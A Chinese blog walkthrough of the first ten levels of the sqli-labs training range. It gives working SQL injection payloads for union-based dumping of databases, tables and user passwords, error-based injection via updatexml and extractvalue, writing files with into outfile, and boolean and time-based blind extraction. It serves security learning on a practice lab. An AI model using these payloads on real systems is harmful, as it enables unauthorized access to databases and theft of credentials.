sql-libs靶场1-10关解析

已于 2023-11-21 08:49:19 修改
阅读量223 收藏 1
点赞数 7
文章标签: sql web安全
于 2023-11-18 16:41:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59023242/article/details/134479861
版权
union联合查询步骤:
判断注入点
http://xxxxxxxxxxxxxxx/Pass-01/index.php?id=1 and 1=1
and两边都为真,回显正常,有数据
http://xxxxxxxxxxxxxxx/Pass-01/index.php?id=1 and 1=2
and一边为真一边为假,回显异常,无数据
构造闭合(字符型)
①在URL链接中附加字符串' -- s即http://xxx.xxx.xxx/abc.php?p=YY' -- s        //判断是否为字符型

②在URL链接中附加字符串' -- s即
http://xxx.xxx.xxx/abc.php?p=YY' and 1=1 -- s        //结果返回正常

③在URL链接中附加字符串' -- s即
http://xxx.xxx.xxx/abc.php?p=YY' and 1=2 -- s        //结果返回异常
则通过①②③判断出为字符型

常用构造闭合符号:
单引号' 双引号" 单引号+括号') 双引号+括号")

常用注释符号:
--空格(经常会在其后面加上一个任意字母区分括号eg:-- s)
判断字段数量
order by:排序  
注意:如果是数字型注入,也有必要加上注释 # 或者 --空格,因为,在数据传递的时候,不知道
order by后面是否跟了其他语句
http://xxxxxxxxxxxxxxx/Pass-01/index.php?id=1 order by 3
判断字段数量,返回正常,说明至少存在3个字段
http://xxxxxxxxxxxxxxx/Pass-01/index.php?id=1 order by n
返回异常,说明不存在n列
union联合查询,判断回显点
http://xxxxxxxxxxxxxxx/Pass-01/index.php?id=1 union select 1,2,3
爆数据
user()   database()   version()

http://xxxxxxxxxxxxxxx/Pass-01/index.php?id=-1  
#-1是让前面的代码失效(不占回显位) 好执行后面我们想要执行的爆库语句()
union select 1,user(),database()
爆所有库名
http://xxxxxxxxxxxxxxx/Pass-01/index.php
?id=-1 union select 1,user(),group_concat(schema_name)
 from information_schema.schemata
爆security库名中的所有表名
http://xxxxxxxxxxxxxxx/Pass-01/index.php
?id=-1 union select 1,2, group_concat(TABLE_NAME)
 from information_schema.TABLES WHERE TABLE_SCHEMA=database();
爆security库名中users表中的所有字段
http://xxxxxxxxxxxxxxx/Pass-01/index.php
?id=-1 union select 1,2, group_concat(column_name)
 from information_schema.columns
 WHERE TABLE_SCHEMA=database() and table_name="users"
爆users表中的用户,密码
http://xxxxxxxxxxxxxxx/Pass-01/index.php
?id=-1 union select 1,group_concat(username), group_concat(password) from users
第1关

类型:字符型

构造闭合符号:'

payload:?id=-1' union select 1,2,database() -- s

第2关

类型:数字型

payload:?id=-1 union select 1,2,database() -- s

第3关

类型:字符型

构造闭合符号:单引号'+括号)

payload:?id=-1') union select 1,2,database() -- s

第4关

类型:字符型

构造闭合符号:双引号"+括号)

payload:?id=-1") union select 1,2,database() -- s

第5关

类型:字符型+报错注入

报错函数:updatexml、extractvalue

构造闭合符号:单引号'

payload1:

?id=1' and updatexml('1',concat("~~",(database())),'9') -- s
注意:
①在concat函数中,我们的查询语句应用括号括在一起  (database())

payload2:

?id=1' and extractvalue('1',concat("~~",(database()))) -- s
第6关

类型:字符型+报错注入

报错函数:updatexml、extractvalue

构造闭合符号:双引号"

payload1:

?id=1" and extractvalue('1',concat("~~",(database()))) -- s

payload2:

?id=1" and updatexml('1',concat("~~",(database())),'9') -- s
第7关(不常见)

类型:字符型+into outfile

into outfile 语句用于把表数据导出到一个文本文件中 
条件:
1)要有file_priv权限

2)知道网站绝对路径

3)要能用union

4)对web目录有写权限

5)没有过滤单引号

构造闭合字符:'))

payload:

?id=1')) union select 1,2,database() into outfile  "F:/res.txt" -- s
注意:
"F:/res.txt" 为文件输出路径 且当前路径没有该文件

在这里插入图片描述

第8关

类型:字符型+布尔盲注

构造闭合符号:'

流程

  1. 首先判断注入点,既不能联合也不能报错

  2. 尝试布尔盲注,首先判断当前数据库长度

    二分法判断长度
http://localhost:7036/sqli-labs/Less-8/
?id=1' and  length(database())>10 -- s    //返回false  0-10

http://localhost:7036/sqli-labs/Less-8/
?id=1' and length(database())>5 -- s     //返回true   5-10

http://localhost:7036/sqli-labs/Less-8/
?id=1' and length(database())>7 -- s     //返回true   7-10

http://localhost:7036/sqli-labs/Less-8/
?id=1' and length(database())>8 -- s //返回false

http://localhost:7036/sqli-labs/Less-8/
?id=1' and length(database())=8 -- s //返回true 确定长度为8

  3. 判断库名具体字符

    判断第1个字符(二分法,依次判断ascii码(33-127)) 方法与步骤2一致
http://localhost:7036/sqli-labs/Less-8/
?id=1' and ascii(substr(database(),1,1))=115 -- s
判断第2个字符
http://localhost:7036/sqli-labs/Less-8/
?id=1' and ascii(substr(database(),2,1))=115 -- e 
... ...
直到判断库名为8个字符的security

  4. 判断表长度(方法同上 二分法)

    http://localhost:7036/sqli-labs/Less-8/
?id=1' and length((select table_name from 
information_schema.tables 
where table_schema=database() limit 0,1))=6 -- s  (例子:emails)

#limit 0,1 限制此时判断的为第1个表
#limit 1,1 限制此时判断的为第2个表

... ...依此类推

  5. 判断表名具体字符(方法同上 二分法 判断ascii码)

http://localhost:7036/sqli-labs/Less-8/
?id=1' and ascii(substr((select table_name from 
information_schema.tables where 
table_schema=database() limit 0,1),1,1))=101 -- s  #(e)
                           ||    ||
                        第1个表  第一个字符

http://localhost:7036/sqli-labs/Less-8/
?id=1' and ascii(substr((select table_name from 
information_schema.tables where 
table_schema=database() limit 0,1),2,1))=101 -- s  #(m)

...  ...
直到找到所有表以及表名   或者想要的用户表

  1. 找到想要的表以及字段(方法同上)后,获取内容

    users表为例  字段为username  数据为Dumb
#判断数据长度
http://localhost:7036/sqli-labs/Less-8/
?id=1' and length((select username from users limit 0,1))=4 -- s
#limit 0,1 表示第1条数据
#limit 1,1 表示第2条数据
... ...

#判断内容
http://localhost:7036/sqli-labs/Less-8/
?id=1' and ASCII(substr((select username from 
users limit 0,1),1,1))=68 -- s
               ||
              第一个字符=68  =》D   
... ...
依此类推 第一条数据为  Dumb
直到判断出username字段所有数据
第9关

类型:字符型+时间盲注

构造闭合符号:单引号'

流程

  1. 首先判断注入点,既不能联合也不能报错,且没有内容变化

  2. 尝试时间盲注,首先判断当前数据库长度

    二分法判断长度
http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((length(database())>10),sleep(2),1) -- s    //直接返回  0-10

http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((length(database())>5),sleep(2),1) -- s     //延时2秒   5-10

http://localhost:7036/sqli-labs/Less-9/
?id=1' and  if((length(database())>7),sleep(2),1) -- s     //延时2秒   7-10

http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((length(database())>8),sleep(2),1) -- s //直接返回

http://localhost:7036/sqli-labs/Less-9/
?id=1' and  if((length(database())=8),sleep(2),1) -- s //延时2秒 确定长度为8

  3. 判断库名具体字符

    判断第1个字符(二分法,依次判断ascii码(33-127)) 方法与步骤2一致
http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((ascii(substr(database(),1,1))=115),sleep(2),1) -- s
判断第2个字符
http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((ascii(substr(database(),2,1))=115),sleep(2),1) -- e 
... ...
直到判断库名为8个字符的security

  4. 判断表长度(方法同上 二分法)

    http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((length((select table_name from 
information_schema.tables 
where table_schema=database() limit 0,1))=6),sleep(2),1) -- s  (例子:emails)

#limit 0,1 限制此时判断的为第1个表
#limit 1,1 限制此时判断的为第2个表

... ...依此类推

  5. 判断表名具体字符(方法同上 二分法 判断ascii码)

http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((ascii(substr((select table_name from 
information_schema.tables where 
table_schema=database() limit 0,1),1,1))=101),sleep(2),1) -- s  #(e)
                         ||    ||
                      第1个表  第一个字符

http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((ascii(substr((select table_name from 
information_schema.tables where 
table_schema=database() limit 0,1),2,1))=101),sleep(2),1) -- s  #(m)

...  ...
直到找到所有表以及表名   或者想要的用户表

  1. 找到想要的表以及字段(方法同上)后,获取内容

    users表为例  字段为username  数据为Dumb
#判断数据长度
http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((length((select username 
from users limit 0,1))=4),sleep(2),1) -- s
#limit 0,1 表示第1条数据
#limit 1,1 表示第2条数据
... ...

#判断内容
http://localhost:7036/sqli-labs/Less-9/
?id=1' and if((ASCII(substr((select username from 
users limit 0,1),1,1))=68),sleep(2),1) -- s
             ||
            第一个字符=68  =》D   
... ...
依此类推 第一条数据为  Dumb
直到判断出username字段所有数据
第10关

类型:字符型+时间盲注

构造闭合符号:单引号"
流程:与第9关一致,只不过闭合符号不同

PS:

  • 如果有同学使用了hackbar插件,在引用代码时,要注意不要换行
  • 本文中换行只是为了优化代码格式
灮迦
关注
sqlmap 常用命令
tryheart的博客
09-01 1272
常用命令 -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 –dbs 列出所有的数据库 –current-db 列出当前数据库 –tables 列出当前的表 –columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 –dump 获取字段中的数据 –batch 自动选择yes –smart 启发式快速判断,节约浪费时间 –forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请求包txt文件) -l 加载文件
SQL-Labs靶场“29-31”教程
热门推荐
钟言的博客
02-27 1万+
本篇为SQL-Labs靶场第29-31教程,详细内容包含了:一、二十九 基于错误的WAF单引号注入 1、源码分析 2、HTTP参数污染 3、联合查询注入 4、updatexml报错注入 二、三十 基于错误的WAF双引号注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 三、三十一 基于错误的WAF双引号括 1、源码分析 2、联合查询注入 3、updatexml报错注入等等
sqli-labs靶场攻略
test_zpx的博客
08-14 480
Good Good Study,Day Day Up!
SQL注入从入门到进阶:sqli-labs靶场笔记
tzyyyyyy的博客
09-26 7016
SQL注入从入门到进阶:sqli-labs全笔记 Less-1~Less64
基于Sqli-Labs靶场SQL注入-第6~10
Joker
11-25 2092
本文讲解 updatexml() 函数报错注入、导出文件字符型注入、布尔盲注、时间盲注、中国蚁剑简单使用、一句话木马注入
sql注入及sqli-labs靶场前几讲解
m0_70483044的博客
01-09 2024
sql注入简介SQL注入是一种常见的web安全漏洞。sql注入是通过恶意的sql查询或者添加语句插入到应用的输入参数中,再在后台sql服务器解析执行进行的攻击。sql注入原因在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中,被当作是SQL语句的一部分执行,从而导致数据库受损。是目前黑客对数据库进行攻击的最常用手段之一。sql注入攻击对象数据库漏洞原因分析web分别前端和后端,前端负责进行展示后端负责处理来自前端的请求并提供前端展示的资源。
网络安全05-sql-labs靶场全网最详细总结
m0_68976043的博客
02-10 3466
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
基于Sqli-Labs靶场SQL注入-17~22
Joker
01-03 1718
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
Sqli-libs详解__第三
henghengzhao_的博客
10-06 664
sqli-libs详解,一看就会,超详细
sqli-lib64笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个卡的键思路、解题方法以及可能遇到...
sqli-labs靶场】第11
qq_61019688的博客
04-26 815
知道了sql语句,接下来就是构造sql语句来进行查询,例如1’ or 1=1#(注意此处不能再使用and来构造恒真语句,因为我们不知道username和password,所以要想判断sql语句是否执行要使用or,这样or后面的语句为true则执行,为false则报错)(还有一个注意点的此处不能再用--+来注释,要使用#)1’ order by 2#,无返回内容,由此可以判断出列数应该是2,对于为啥order by 2无内容返回因为是可能不存在username=1,所以查不到内容。1’ or 1=2#报错。
Sqli-labs靶场第2详解[Sqli-labs-less-2]
m0_73615178的博客
02-19 663
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
ubantu下搭建docker并搭建sql注入靶场
世间繁华梦一出
12-08 1629
文章目录什么是Docker?Docker基本语法在docker上搭建sql-labs 什么是Docker? Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源。 Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。 容器是完全使用沙箱机制,相互之间不会有任何接口(类似 iPhone 的 app),更重要的是容器性能开销极低。 说白了就是一个开销更低,安装更便捷的虚拟机。 Doc
PostgreSQL的表碎片
文牧之的博客
09-29 506
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
实用SQL小总结
UntifA的博客
09-29 1341
SQL记录
PostgreSQL 字段使用pglz压缩测试
最新发布
文牧之的博客
09-30 404
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
sql中的regexp与like区别
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
09-26 5307
对于字符串数据的模糊匹配,REGEXP(正则表达式)和LIKE是两个非常有用的操作符。
SQL中基本SELECT语句及常见键字的使用(内连接,左/右连接)
qq_43800449的博客
09-29 916
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句键字主要包括 insert 、 delete 、 update 等。
Ubuntu 14.04 安装ia32-libs失败解决方法:步骤详解
在Ubuntu 14.04版本中,遇到`ia32-libs`安装失败的情况,可能是由于系统缺少ia32架构的库包或者某些包已被替换,导致安装过程中找不到对应的安装候选。当执行`sudo apt-get install ia32-libs`时,系统提示`Package ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值